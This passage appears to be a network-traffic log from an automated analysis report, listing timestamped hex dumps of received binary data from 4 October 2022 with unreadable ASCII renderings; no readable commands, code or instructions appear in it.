                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7287INData Raw: 01 4e ef 8d ff 0b 0a fa 95 a2 cf 7e 4a 8a d4 09 23 9a a4 31 b6 68 ec 7c 7d 70 38 d0 09 4f f0 f0 c3 a0 b5 1a ba b1 85 ce bc a2 8d d5 98 99 d1 bd 6a d1 2f ce 60 e5 c1 01 71 93 f9 94 ef 19 7b 9b af ef 9d 4b a7 64 bb f0 90 bb 3b 89 3b 07 e5 ad 56 6d 33 2d 74 86 c7 09 df 78 bc 41 a6 8f 10 4e d6 40 b7 21 d9 7b ac 98 3c 90 95 bb c9 f7 ab 96 4d 9b e2 80 8c 10 18 9e 04 91 e4 a3 a6 fe c8 0e 80 ae 9b 2d 32 58 be 54 29 6b ff a7 ae 5c 0e b0 f0 8e a3 70 bf a5 24 46 ae b0 45 62 8c f0 e3 de 62 6d 43 c0 56 d8 5a 5f 39 5f dc b6 ef 6f 89 fa 93 1e 71 cb 31 4f e5 ed c1 2a c1 05 59 1d da 5d dd 07 b3 bc 1e b1 c1 fc d3 39 7e f1 41 75 4d 89 df 9c 9c 9c f9 37 ec 60 40 b4 8b 2a e9 76 30 09 a9 d3 ec 4f bd a6 58 45 d2 22 4e d8 ae 9d 56 e4 59 9a 3b 43 9b c8 1f fa 49 d8 ac 54 e2 4b 4e
                                                                                                                                                                                                                                    Data Ascii: N~J#1h|}p8Oj/`q{Kd;;Vm3-txAN@!{<M-2XT)k\p$FEbbmCVZ_9_oq1O*Y]9~AuM7`@*v0OXE"NVY;CITKN
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7303INData Raw: 58 f5 84 29 57 31 27 aa 94 f1 e4 64 9e df a0 df 13 27 24 70 4e 79 25 b2 ea 17 44 c6 e2 49 59 27 4f c7 71 d5 cd c6 5f e1 cb a8 d0 55 73 7f 7a 43 81 90 12 b8 88 38 3b 11 d0 ac 3a d1 e4 0b 73 4f 84 d4 ce 5b 32 52 56 9c 2d 82 8c b1 51 2c 72 56 b0 55 92 80 a1 89 5d 33 cf 82 2a 96 00 ed bd ae 92 5a a5 26 f9 fb c5 76 04 6f 41 87 7a 65 b5 88 9b e9 0f 7e 85 95 c5 87 5e 8d 9a 2e c3 e9 40 44 2f e4 72 db 3d 19 d1 96 9d 07 42 3c 3a c0 0e a9 23 7a e4 be ff be d9 13 73 2a c6 07 c4 64 b6 31 62 7d 93 5f e2 ea 01 74 72 ae 81 5b 16 e1 41 a0 fd c5 ea a3 87 d4 61 65 90 ca fa 55 da db cc 00 f5 79 28 51 80 54 56 d1 d3 64 49 dc 0b bd 76 ba 00 eb 8a 31 d4 4b b5 87 02 fd 3c 86 b8 b8 d4 1d 9b 28 6a e1 ef be 45 25 0c 80 26 33 be d0 40 b6 8c 5e 38 93 83 6f 34 93 47 ad e4 f8 60 2a ed
                                                                                                                                                                                                                                    Data Ascii: X)W1'd'$pNy%DIY'Oq_UszC8;:sO[2RV-Q,rVU]3*Z&voAze~^.@D/r=B<:#zs*d1b}_tr[AaeUy(QTVdIv1K<(jE%&3@^8o4G`*
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7319INData Raw: e4 41 5f c6 33 f0 74 62 ff ac 32 4e 10 d4 28 39 b3 75 10 e3 4a 8d 20 e6 24 6e c1 63 26 28 6b b4 23 61 6c a1 79 04 e6 39 b4 bc 55 5c d9 7f 15 8a 24 c4 13 6a 4b d4 f5 99 e2 2d 3a f2 b5 67 b3 5c a8 31 10 e8 c7 f0 8c 5f 1b 4f 8c 3f 36 e4 c6 67 75 bb fc d0 af 1d f7 26 16 7e 29 46 1d 35 7a ff b4 28 a7 80 7a f0 da 8a 29 54 55 0c b5 45 2d 00 f9 0c 5b 41 0c 66 b3 b5 6f 05 ed 4b 06 dd 54 d1 c7 f3 1d 48 cc 77 0a c7 e2 12 89 50 b1 57 27 2d 00 91 a8 6b d9 e3 58 a2 87 2e d0 36 8b b2 a8 2c ec 96 5f a8 58 6e 6e ec c3 d6 14 31 ff f4 f6 92 d7 cc e5 e5 5c 8d a2 75 5d c0 7b 2f ee f7 3d d3 62 5c f3 92 42 d3 68 8b b4 19 8e e7 58 ec 12 84 02 18 b0 c2 a3 8a fd ac 87 e0 11 f5 fb 48 77 97 a3 26 06 b8 ad e6 c8 47 e4 bb 74 33 6a d5 a2 2c 0d ab 2f b9 b1 8d fa 45 d8 a0 6f 66 1e aa 1e
                                                                                                                                                                                                                                    Data Ascii: A_3tb2N(9uJ $nc&(k#aly9U\$jK-:g\1_O?6gu&~)F5z(z)TUE-[AfoKTHwPW'-kX.6,_Xnn1\u]{/=b\BhXHw&Gt3j,/Eof
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7335INData Raw: 92 64 a5 0a 99 f4 31 15 a3 bb 1c 9b e6 b7 4b b6 fd 07 fc 75 d6 0c 0d fc 24 08 f0 d0 fd db 85 1e 8d fa 57 4d c9 e1 5a 6a 4c 00 34 23 46 ef c6 4b 64 1b e6 28 51 ed 6e a3 02 d9 c9 d1 ce e8 6e 1d c5 31 26 57 17 c1 ee d3 9d d5 16 05 a9 15 77 f4 1f 66 ee f1 01 02 19 ac d1 2b a1 d1 4e f9 64 3d e2 dd ea f7 30 93 bc 35 1d f3 c9 ee a9 24 a8 4f ea ae 48 ca c0 49 cb 61 3c 1a 16 b6 e8 39 bf 5a 63 5d d9 94 ff 05 66 88 00 21 29 d9 32 81 bd ee aa e5 67 07 83 ed 55 42 c7 77 16 ea 4e f0 d9 1a d4 00 f6 20 89 db fc 6d b9 65 f7 53 62 ca 19 35 fb ef 9b 1e b4 8d 9a 9a 82 ea 56 d0 b8 92 c5 9e d5 5b 89 01 79 12 12 79 27 e1 d5 1c 75 97 5c 29 af d8 40 dd 73 e6 f6 4e d2 dc 28 c4 e5 25 23 86 0e 24 62 a2 87 e9 a2 08 c0 f3 a2 ad de 9a 97 db 06 64 a1 63 2a 5f 58 d3 00 24 63 c4 e0 bb b2
                                                                                                                                                                                                                                    Data Ascii: d1Ku$WMZjL4#FKd(Qnn1&Wwf+Nd=05$OHIa<9Zc]f!)2gUBwN meSb5V[yy'u\)@sN(%#$bdc*_X$c
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7351INData Raw: 43 84 2f 32 37 f1 6b 6f 54 9b fe ca 00 c0 23 ef 9d 9a 96 a3 bb 4b f3 eb 50 9a df 26 9b ae 70 36 19 23 ce 4a fe 45 aa 33 0d 5a e2 18 5b ea d4 a7 ee 9e 18 e3 c0 96 91 21 c3 d4 09 66 c7 ff 20 b2 df 15 94 30 14 08 d6 c4 e0 c9 e3 45 07 91 db f9 3f 0a b7 b5 b0 46 3c 04 e0 1b 51 5a ea d3 12 02 00 55 b4 69 6c 81 91 81 88 b3 4f 2a 97 80 1e ef 0f 76 36 94 56 68 50 86 9c 8c 69 76 36 36 30 13 45 ce 3c 86 ff 95 c3 6c f0 4e c6 5d 7f 46 30 17 63 3b 71 90 f1 3b e0 24 8e c9 dc 3c c3 f2 3a 33 0e d7 ed 1e e5 d1 20 c3 86 fd f1 f9 07 75 7a f7 26 cb e6 79 ca 0c 33 7e 5f 5d cf 1b f0 f0 19 6b 1a ec 52 ff 9e 65 ea 26 fb 4b bc f2 95 cf 85 a9 ed 90 5d 3d f2 63 44 0c 50 10 ab 61 c5 43 8a 02 91 67 3b 19 4e 65 3a 8d 2e c6 2f f5 18 5f b4 4e ca ad e9 c9 c4 cd d1 c2 29 e0 37 bb 7f 6b d1
                                                                                                                                                                                                                                    Data Ascii: C/27koT#KP&p6#JE3Z[!f 0E?F<QZUilO*v6VhPiv660E<lN]F0c;q;$<:3 uz&y3~_]kRe&K]=cDPaCg;Ne:./_N)7k
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7367INData Raw: 43 bf 21 46 63 d4 d9 39 71 ee f9 52 41 36 28 65 37 f9 24 ce a9 f8 12 b0 2b 3b a3 1e 7f bb 53 b5 91 dc 13 92 84 e9 32 a9 5a b0 da ce e6 b2 f5 66 e4 ec 5d 46 bf 63 e3 81 92 b9 eb 85 a7 5c e4 73 b4 13 93 ac 6a 7d 72 14 7a 77 f1 44 f7 52 c8 21 70 03 ba 74 88 55 3e cd ba 92 8f d2 ef 34 58 e1 61 54 b8 d3 a2 49 0f 3b a1 b5 32 74 a3 b1 7b 05 6d 6e 64 d0 de 69 f0 80 83 2f 89 47 e2 0a 0f e0 75 d5 6f 1d 6e 88 1f 41 c2 a4 d7 ff 18 f5 4f 0e 78 6c 7d d0 7a 06 97 59 61 3f a3 b8 1e 16 55 3c 7e 94 be 4c 61 f7 fe c8 db 05 0e d2 fc 89 d7 b2 f0 16 a3 2f 01 fd c2 9a 68 51 e7 be a7 51 b7 87 46 72 42 4b 0d 79 15 e1 d5 6d 99 52 db 90 6a ba 35 4f 74 c6 85 7e dd 31 dd 01 a5 59 c3 1a 40 89 c3 88 d4 21 3c c9 47 d5 e7 80 a8 bf ae 95 07 73 44 fb a9 9c a3 c7 04 cd c9 d0 e8 e7 50 80 ad
                                                                                                                                                                                                                                    Data Ascii: C!Fc9qRA6(e7$+;S2Zf]Fc\sj}rzwDR!ptU>4XaTI;2t{mndi/GuonAOxl}zYa?U<~La/hQQFrBKymRj5Ot~1Y@!<GsDP
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7383INData Raw: 3a 52 e9 b1 2e 5c 40 c9 20 fc 8d 4a 4b 3c 7c 1f 75 23 67 03 e4 0b 38 07 65 dd b4 8a 01 f2 7a 61 30 f7 2d a8 a0 32 9e 54 59 24 53 29 39 3f ab 21 c5 65 18 bb 87 c0 3f 42 23 a9 b5 1e 84 a9 2c 98 4d 9e ec d0 dc ec 71 c2 9d 9f 5e 53 12 de 38 6e e1 13 8b bc 16 02 ff 1c 95 30 2b 73 4f 26 ca 70 dc fa 82 29 3e 27 33 94 b4 a5 b1 e8 bb 35 da c3 e9 f8 b5 cc 02 1e c5 41 25 be b5 4c c7 a9 df 12 e8 9b 1c c6 86 27 1e eb b8 58 71 df 5a 91 d9 f4 21 5f ff 4c 47 49 ba 15 57 42 77 41 b2 d2 0e 9f db 29 5b 79 f7 0b ad 0f b2 e5 b1 54 6c 60 f8 62 ce 2d 05 f7 77 a5 29 4b c9 76 8f 8e 83 c4 ab 0a 70 8b f8 77 98 e0 64 a0 ca 1c 05 c8 76 74 78 d8 7d 64 1e 70 6e 2e db 1e 16 89 48 d2 77 f7 fe 50 2b 09 1f f6 e7 9c ab e8 e7 70 58 94 3b 7a 7b f5 0c cd ca 7f b2 3b 87 ab f8 a5 e1 19 91 2d dd
                                                                                                                                                                                                                                    Data Ascii: :R.\@ JK<|u#g8eza0-2TY$S)9?!e?B#,Mq^S8n0+sO&p)>'35A%L'XqZ!_LGIWBwA)[yTl`b-w)Kvpwdvtx}dpn.HwP+pX;z{;-
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7399INData Raw: a6 7e df 5f 21 48 35 3e 53 5a 4b fb 2f 0e ed 98 b2 f1 4d 45 4a 32 84 28 77 a4 42 31 68 f2 53 36 c9 7f bf 61 13 90 26 ca b7 30 29 8d c5 b9 a8 4b 3f 2d 77 40 0a a2 da ac f7 8f e7 2c d7 54 53 cd ae 06 3a 3a 0c 79 83 a6 9e 97 ae 21 ad 08 a5 cc 3e d1 fe 07 7a 35 3e 4e 8f 5f 0c 1d c9 48 0f b2 c4 8e 18 aa d0 98 0d 52 64 94 98 8c 51 15 a4 33 d5 48 b6 01 dd 65 68 1a 90 37 d7 18 69 d6 6a 7b c2 c2 c4 f4 ab 6e 94 80 07 03 ee 7d 19 f1 11 9f 59 92 b8 16 77 e6 31 57 74 9f 98 86 60 89 fb dc 32 00 98 33 85 96 27 a3 20 16 a3 05 3c 95 25 e7 9b 88 a5 d6 4f f4 03 51 96 ec ca f3 e2 59 c0 77 c0 d7 c9 fb a8 40 2a 06 b6 0c 78 8c d2 0f a6 e3 d1 3a 37 71 38 3f 72 a3 5f d8 8a a6 68 eb 97 c3 37 9e c0 0b 42 c2 4c 0c 64 b3 80 29 1b b3 fc 6f 4a db 51 1b 11 c2 0f d5 1b f3 af 32 88 d8 29
                                                                                                                                                                                                                                    Data Ascii: ~_!H5>SZK/MEJ2(wB1hS6a&0)K?-w@,TS::y!>z5>N_HRdQ3Heh7ij{n}Yw1Wt`23' <%OQYw@*x:7q8?r_h7BLd)oJQ2)
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7415INData Raw: e3 45 20 04 e5 89 f2 a0 7d 33 f1 49 18 7d bf 78 df 77 55 72 36 e9 57 15 05 cf 73 24 22 dc b5 e6 ab 36 56 09 8c f0 07 b1 90 8f 5f 88 8a 14 0d 9a 8e 36 38 c0 f5 48 23 a6 0e 4a f3 40 f8 50 62 23 28 c9 f6 3c 74 46 94 18 a2 a3 af 36 32 a2 06 ec 8a 13 d7 18 a1 2a f9 68 33 7e e2 bc 16 94 c6 cb 05 b8 e7 ca 1a 59 d1 4b 56 66 fd be 67 df dd 8e d5 9b 0c fd 65 0b 4c 60 0c 4f c7 9b 79 1b 7e 4d 7e 29 47 6f 94 d1 77 77 79 16 88 ca a2 96 df 4f cd 67 78 c8 26 e4 a0 12 12 c9 9c a1 05 44 f1 92 04 f0 c4 96 7b 06 60 63 a2 6a a5 b5 e5 2a 2a 5f b9 3d c3 19 8d 37 94 5b 25 c3 c7 e8 90 cb ea 86 29 36 df ea b0 ba 9b 00 c0 1e af 75 53 98 47 1b 40 7f 1d 4d b1 08 d6 e7 8f ea c2 0b 57 70 de 72 58 7c 96 bb 9b a9 c3 57 04 3f ca cf 8e 99 0a 15 b3 11 85 a0 78 82 4a cc 35 44 36 78 d6 a8 f0
                                                                                                                                                                                                                                    Data Ascii: E }3I}xwUr6Ws$"6V_68H#J@Pb#(<tF62*h3~YKVfgeL`Oy~M~)GowwyOgx&D{`cj**_=7[%)6uSG@MWprX|W?xJ5D6x
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7431INData Raw: 53 a0 c1 dd 21 f4 e1 d9 8a a4 71 f3 0b 54 8d e1 2c d3 71 3d a3 86 70 55 64 cb 27 2d ac d3 5b 60 7d 85 a8 88 d5 69 92 79 bb ab fc 72 03 71 6d e7 66 fb a8 b8 40 7f 42 b2 d6 4a 0e d9 9c 9d 82 9f e9 fb b0 da b7 6d 3d c2 cb 8c 7d 9d fb 90 9c c8 e9 66 83 98 35 d8 19 91 fe fc 94 01 97 28 b5 0c 29 5c cf 86 de 21 8d 06 df 2a d6 e1 03 ad aa df f3 34 17 5d 50 38 1e 82 4a ce 42 a3 87 c1 05 6f 0e 92 e1 1a b8 b6 70 4b 68 44 c3 54 b1 af 94 01 a8 2d 55 5e 25 5b 98 50 c9 09 21 f2 02 74 69 4c 6d 5f e9 f5 98 f6 18 22 4a a2 96 ef 24 b8 70 7e d5 9e 3a 05 43 c6 7a 64 78 54 88 ef c6 d1 36 52 56 e7 dd 01 c5 c8 d0 46 de 25 fe 73 9e 73 3d e5 25 4b 5f ce 39 0e 41 28 03 01 09 b8 e6 10 82 71 dd c4 c4 e0 de b8 4a 58 34 28 39 2e a7 96 d0 d8 b4 b3 86 c6 a3 e1 37 ff 0b cd 42 2f 8e 44 f2
                                                                                                                                                                                                                                    Data Ascii: S!qT,q=pUd'-[`}iyrqmf@BJm=}f5()\!*4]P8JBopKhDT-U^%[P!tiLm_"J$p~:CzdxT6RVF%ss=%K_9A(qJX4(9.7B/D
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7447INData Raw: 01 9f 13 a4 ec 01 29 6f 4c d4 0f 00 06 21 4b 96 43 53 9a 82 e5 18 b1 3e e5 7c 73 7e b8 94 fc 64 45 5a 86 6b fa 8b 7a 77 30 fe 0e ac 04 30 8a 14 a9 38 99 90 a9 0e b9 79 46 f1 e5 cf 50 51 b8 d6 30 40 9e cd 7a 46 e7 a4 05 53 86 4f 48 0c 70 78 23 f5 10 af 39 e0 c7 64 46 aa 70 97 f3 03 f0 91 e0 67 0f 47 c1 35 3e 81 7d 18 41 9e 7c 88 96 23 ac 4f b2 29 8e 15 2a a5 55 5a 68 c1 78 78 3f 28 01 96 a0 15 fd f7 85 b3 cb 80 e2 e7 3d 1b 5a 5d 59 c0 0d 0d 31 f6 c1 7e 4c 72 1b 35 da 75 e3 60 44 b4 e3 14 a4 d8 12 90 0e d7 36 dc 4c fe 94 4b 62 b7 04 6a 1c 24 ec 18 33 cb 67 e9 93 e9 db 27 f9 5d 8b 42 5e e3 8c ce 7d d8 e1 b8 6b 8a 0d 25 85 fa 69 fb f0 d7 d5 92 e6 1c e9 2a 54 01 ab 80 99 08 f6 6b ae ec ab e5 17 4d ce ea f2 b1 6d cc 6c e3 62 18 39 e9 16 f0 7c 94 dd bf 2f 30 e4
                                                                                                                                                                                                                                    Data Ascii: )oL!KCS>|s~dEZkzw008yFPQ0@zFSOHpx#9dFpgG5>}A|#O)*UZhxx?(=Z]Y1~Lr5u`D6LKbj$3g']B^}k%i*TkMmlb9|/0
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7463INData Raw: 82 15 a9 f2 b7 a6 1e 02 7b d9 76 35 70 81 e2 5c 3c 46 c5 5b 71 22 62 92 ce d2 89 be d6 b4 95 77 f1 78 00 c2 70 22 c1 55 e5 ef af fc 42 81 f5 4f 42 ef 09 b9 14 78 f4 3a 6f 0b 36 b9 95 0d 33 02 f2 d5 3b 69 62 a6 d0 ec c8 7e c3 2c 44 4e b3 f7 d8 0e f8 0b 78 3d e9 9e 17 98 73 cb 52 27 98 1d 1c bd 39 d4 75 58 49 0d b3 f4 e4 62 cc c3 6f 31 2d d0 19 fe d8 fd 6e 82 f3 aa 65 08 69 d0 26 34 0a 93 fd 67 48 22 39 f0 ec 0d 30 ec c7 bc d6 9d ce 60 07 a4 17 8f c3 47 e9 e2 f4 94 1a 2a 3e bc 6c 59 ec d6 86 81 34 d3 08 f0 35 12 65 77 f2 d4 db 87 fd 5b af 83 85 62 f8 79 4c 2b 22 d8 fb d6 5a df e1 40 1c d4 a3 4a 9c 15 ce 90 44 e2 1c f5 41 9d b0 ad 03 3d bc 06 d7 4b d7 de b9 83 d5 f4 e8 d8 cd 5d bc 4e a3 a9 01 54 0a eb 43 07 40 4c 02 95 31 7b 33 36 3c e4 7f 1e 7c 2a bf c8 91
                                                                                                                                                                                                                                    Data Ascii: {v5p\<F[q"bwxp"UBOBx:o63;ib~,DNx=sR'9uXIbo1-nei&4gH"90`G*>lY45ew[byL+"Z@JDA=K]NTC@L1{36<|*
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7479INData Raw: 53 4c e3 78 05 07 94 23 f2 32 7a 44 fd 73 e0 78 32 2b 30 ec c7 05 22 14 88 e7 28 16 76 8c 36 ec b5 bc 4d fb 69 a7 e0 a0 83 7c e6 9d 8d 75 77 c8 28 ee fb 60 e0 c8 4a 1e d7 8c 70 85 bc 15 b8 9e 3e 73 4c 7b 83 52 eb 96 1b e2 92 e6 50 00 07 af 8f 81 3a ae 8b a5 db 1a f1 99 41 25 57 b6 32 a7 fd 85 78 f9 81 c3 81 25 66 bc 47 90 1f 5b a1 cc 04 60 99 fd bb 35 c5 94 e0 51 8e 23 0b bf d1 a3 42 df ab 32 1e 7c 71 60 50 df 98 45 27 f0 7f df 19 4c 1b 66 16 fb 64 60 a4 c7 bb 5c aa 45 2d ce 19 33 ef b2 39 91 68 e3 bc f9 34 68 d2 85 9f d9 6d f3 1e eb e8 ed 24 68 e5 5d f7 74 14 a6 ea 5b ed 54 2e ab 66 40 9d 78 07 b1 66 8d 17 1f d1 ef 70 2e ab dd 19 61 e0 61 44 5c 00 21 07 7e a5 d8 d8 90 55 e6 5d a9 dd 48 ea b6 46 c6 0f 69 68 87 f0 88 71 bb ba 73 a8 09 f2 04 96 6a a2 29 6b
                                                                                                                                                                                                                                    Data Ascii: SLx#2zDsx2+0"(v6Mi|uw(`Jp>sL{RP:A%W2x%fG[`5Q#B2|q`PE'Lfd`\E-39h4hm$h]t[T.f@xfp.aaD\!~U]HFihqsj)k
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7495INData Raw: 30 ea a6 e4 64 f4 f4 07 25 23 6e 8e 98 f9 f7 ae 57 41 8f 24 f4 d7 19 ed a5 09 a5 e1 9b 9a f9 6f 4a 81 48 9d 40 07 1e 59 b8 5c 6a a8 62 a0 70 b8 e3 8c 80 42 1a ef 1b 91 42 53 32 84 4d b7 dd fd 67 76 51 58 8a 28 7c dd c9 27 ce 96 8e 2e 30 e6 ba 42 03 87 dd df 63 77 1e c8 4e eb 68 44 ec f4 5a 03 d3 e9 f1 bc 14 5a 53 71 d0 c3 39 33 0b b9 16 da 7e 33 9a c5 c1 ee 1e ab 7c 77 d8 af fb a9 22 f1 55 2c 9b fa 35 86 ef a7 5f cf 3a c0 11 ae 55 de 28 17 01 b7 4e 46 22 6b cb bf fc cd cf e9 8a 3e e7 0e a3 de 83 01 e2 dc 9b 28 60 03 19 37 c7 c5 78 84 88 30 14 17 36 f6 ee 54 65 b9 49 d1 95 94 30 f4 4b 1a 97 12 d3 53 a9 84 4f 1a bc 29 4f 1e 6b df 96 9f 16 f0 4b 37 f7 0b fc 77 39 56 3f 0f 3b 1f ad 72 70 21 89 4c b0 10 f2 bc 52 97 99 d6 c9 ca 76 56 c9 9c e6 4d 3e f5 2b 90 0b
                                                                                                                                                                                                                                    Data Ascii: 0d%#nWA$oJH@Y\jbpBBS2MgvQX(|'.0BcwNhDZZSq93~3|w"U,5_:U(NF"k>(`7x06TeI0KSO)OkK7w9V?;rp!LRvVM>+
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7511INData Raw: e9 4d 40 4a 10 03 90 b7 38 fd 01 d0 1e c5 21 cf 1e da f1 cf 3b 3f 95 4e 19 ba 18 d0 b4 fe 5c 67 52 3a cf e4 a2 af a9 26 67 86 c8 03 d7 3d 6f f8 b7 b7 e7 11 a0 ad 1b 24 86 1a 87 74 78 2b eb 36 c3 96 0d 81 df 63 3a e8 e6 56 12 2a 93 d2 e7 75 cd 02 e6 12 5d 5e d9 be 70 80 e0 5a 4f c3 aa 90 45 6d 2c 8c 37 c1 33 c0 73 d8 ae 6c 03 32 d1 93 84 04 17 b9 04 43 5c 29 b1 31 a7 a5 ac 9a 11 4d 9f 54 8f 35 96 bf 50 6e d0 06 af 5c 4d c8 93 23 e2 5a 55 da 39 f6 ae 98 40 28 72 8c f0 f6 30 74 ea 89 ad 3e 01 12 9e 49 fe c3 46 9a 71 db 61 81 b6 2e 17 d0 82 b9 2c f6 77 4c c8 ce fc 0b 53 de e7 21 c4 15 d7 26 db b4 49 74 9f 1e 92 a9 49 88 7a 3c e6 fd 9c ff 39 b5 80 d2 a3 56 1d 4a 84 7a 8e 39 fd 41 f8 f7 c1 f2 36 2e da 95 c1 2a 0e 4d 4c 8e 6d 2b a6 03 99 90 7c c8 7b f0 72 e4 c4
                                                                                                                                                                                                                                    Data Ascii: M@J8!;?N\gR:&g=o$tx+6c:V*u]^pZOEm,73sl2C\)1MT5Pn\M#ZU9@(r0t>IFqa.,wLS!&ItIz<9VJz9A6.*MLm+|{r
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7527INData Raw: b3 44 a6 3a 5d 39 e9 74 b2 23 c9 c0 fd 87 cc 42 a4 4c f5 dc 51 fb 83 61 4d 39 90 32 6b bc f3 d0 75 5a 23 88 a4 34 e9 31 7d 52 8d ec 2b 7a bf 76 7b 00 a8 75 0d 80 8f 58 ac 71 b0 e4 28 f5 d4 96 f9 00 20 58 ab 47 86 96 ea 68 bf f1 f9 75 f5 19 b5 3e 00 a6 9e f2 61 6c f6 59 24 3f 90 e2 9d 75 ba 63 e4 56 ea 01 b9 d4 6f c9 07 da b6 12 c9 7a d7 91 0c 5f 0b be 57 ed f9 bb 9f 84 e5 35 56 ac bf 59 3f 6f fb db 93 25 31 c5 cd b7 49 6d 79 19 9e 6b 26 3e c0 41 ad 66 6e 5d 25 18 dc b2 ab d9 35 d3 1a eb 24 b2 61 6a 34 77 76 f6 36 f0 00 ee 77 3e ca 2d 92 26 fb 94 1c 13 22 d2 b6 bb 86 94 ed 5e 16 b8 74 98 55 ba 8c c2 78 91 3c 68 79 1e 4a b1 f3 b7 2d 49 c1 ae 11 35 38 9a ac b9 90 49 36 04 73 28 3d e0 71 e0 a2 e2 ed a3 0d 6b ca 07 09 96 86 32 37 b0 f2 06 93 85 9e 04 9e 4f d6
                                                                                                                                                                                                                                    Data Ascii: D:]9t#BLQaM92kuZ#41}R+zv{uXq( XGhu>alY$?ucVoz_W5VY?o%1Imyk&>Afn]%5$aj4wv6w>-&"^tUx<hyJ-I58I6s(=qk27O
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7543INData Raw: 69 a1 fa 4c 96 eb 5d 7d f2 b0 49 bb db f3 1c 58 34 26 5b 3a b4 02 31 58 ae 9b c9 86 22 f7 f6 21 6c 56 5a dc aa a0 d5 49 cf 82 fe af 8c 8b 2a 82 3a db 24 c5 0e f3 73 eb 76 11 66 f7 a8 fb a5 8a e6 d2 ab ad 98 83 f2 e8 a1 7e d1 20 73 23 9b e9 1d 5c a4 e1 4e 8a 71 70 43 34 44 1f 65 78 df b3 d1 31 8f e4 5f 27 d5 32 7e 7f a7 a3 c0 f1 90 50 0c e8 b2 b1 9d f0 b0 6c 1a 5b a5 1f f0 be b3 d1 63 c0 e3 95 d7 a0 61 88 ac dd 08 48 48 17 19 48 0b 85 2a 27 5c ef e2 cd 3e 39 54 59 27 7d fe d4 9c c7 21 4a bc b6 fc 3d 86 6c 00 bd b7 d6 27 5c 35 55 20 9e 63 3c 1d 1f e8 8e c6 ea f3 b3 a9 50 c4 8d f4 20 f5 62 c7 f5 a2 b9 58 4c ed 8f 5e c1 b7 21 91 a4 3d cf 2b be 5d 80 0d de c5 90 56 10 bf c6 87 f1 7e 98 63 fe cd b6 b9 c2 cb eb 0e a1 44 21 f1 16 e9 95 57 35 22 c9 41 a5 85 be 6a
                                                                                                                                                                                                                                    Data Ascii: iL]}IX4&[:1X"!lVZI*:$svf~ s#\NqpC4Dex1_'2~Pl[caHHH*'\>9TY'}!J=l'\5U c<P bXL^!=+]V~cD!W5"Aj
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7559INData Raw: 95 c1 59 38 9a 46 bb 46 44 50 d4 1a 92 a7 3d c0 df 8b 3d d4 f4 97 38 96 f0 b0 31 e0 a5 d7 53 72 eb e2 c0 4a 00 14 df 7e b2 6b ce 08 e8 31 1e 83 a9 bf 4b 76 e7 ec 32 47 2f 38 ed b0 a9 26 6e a4 04 82 a9 47 86 1a 17 80 ec 70 41 3b 5c 36 87 1a 9e 55 29 00 ff c8 39 97 3d c9 b8 5c fd 70 fa e4 b9 4b c3 62 0b f4 97 7e bb d3 1c 3f b3 e8 20 71 50 80 d8 a6 39 a2 52 38 0e 5d 12 4e 29 20 15 22 a2 7d 0c de a8 e8 87 f1 37 46 01 b0 01 a0 7c 11 e6 e2 a8 36 9e 29 6e 4a 63 c7 09 18 16 a6 17 bb 46 49 04 0a f0 56 bb c5 48 d1 b3 ad 75 bc 5b 79 9b e6 88 53 75 b6 0b a3 2b 05 1d 3e 4e dd 99 6c b3 b8 54 91 6f b7 b1 e7 c2 ef 9c b2 d2 c7 d4 fc 7a 1e 79 8d 03 92 a4 05 96 02 ea 97 30 e8 07 d1 52 a6 d3 a2 1a 02 1e 55 88 0f 20 31 67 e6 51 cc 41 e1 a4 d5 dd 5d fd e3 50 cf 29 b5 8d ea 31
                                                                                                                                                                                                                                    Data Ascii: Y8FFDP==81SrJ~k1Kv2G/8&nGpA;\6U)9=\pKb~? qP9R8]N) "}7F|6)nJcFIVHu[ySu+>NlTozy0RU 1gQA]P)1
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7575INData Raw: 68 a4 6d 79 ee 1a c3 a8 29 d0 0c 1c a3 18 1b 9d 27 90 dc 34 77 d6 6b 00 0c 56 8d 08 66 a3 ce a9 90 16 74 5c a0 d7 50 42 fb fd 45 01 2b 96 8a 33 f0 43 24 7f 00 cb 60 40 e1 30 21 20 38 4f 8f 68 dc 12 21 ff c0 e7 7c 14 13 84 7f 19 17 ea bc 34 fa 31 46 e6 30 16 98 18 61 64 5c cc 54 f5 52 a9 04 89 ea ba 64 cb a4 e0 26 d6 09 3f 55 51 f9 d2 a2 c2 e3 2f 85 ae 2b 8e 87 1d ed 0a 88 37 95 a5 09 fa 77 47 c5 7f 7f 62 be 83 06 52 7f 1a a3 58 f8 54 ca 4a 3c 56 8b 30 3d bc 5e e4 52 31 49 a5 78 0b 3f e5 0e 79 7e 2e 4b 3a af 12 af b5 8c 3c 24 b1 73 a2 f5 bf 33 37 4e a9 17 1b c8 20 cb 86 e0 cc d0 ac 95 d4 09 40 7b 48 ac 0c 33 51 c8 75 f4 34 a4 6b 5f 06 bd 50 81 85 c6 01 5b eb e2 c7 40 0f 14 54 97 9f d2 3d ff 46 d9 cf 80 c2 fb 3d 15 e8 2c 48 ed af f1 3e e8 8e f9 30 38 f7 c2
                                                                                                                                                                                                                                    Data Ascii: hmy)'4wkVft\PBE+3C$`@0! 8Oh!|41F0ad\TRd&?UQ/+7wGbRXTJ<V0=^R1Ix?y~.K:<$s37N @{H3Qu4k_P[@T=F=,H>08
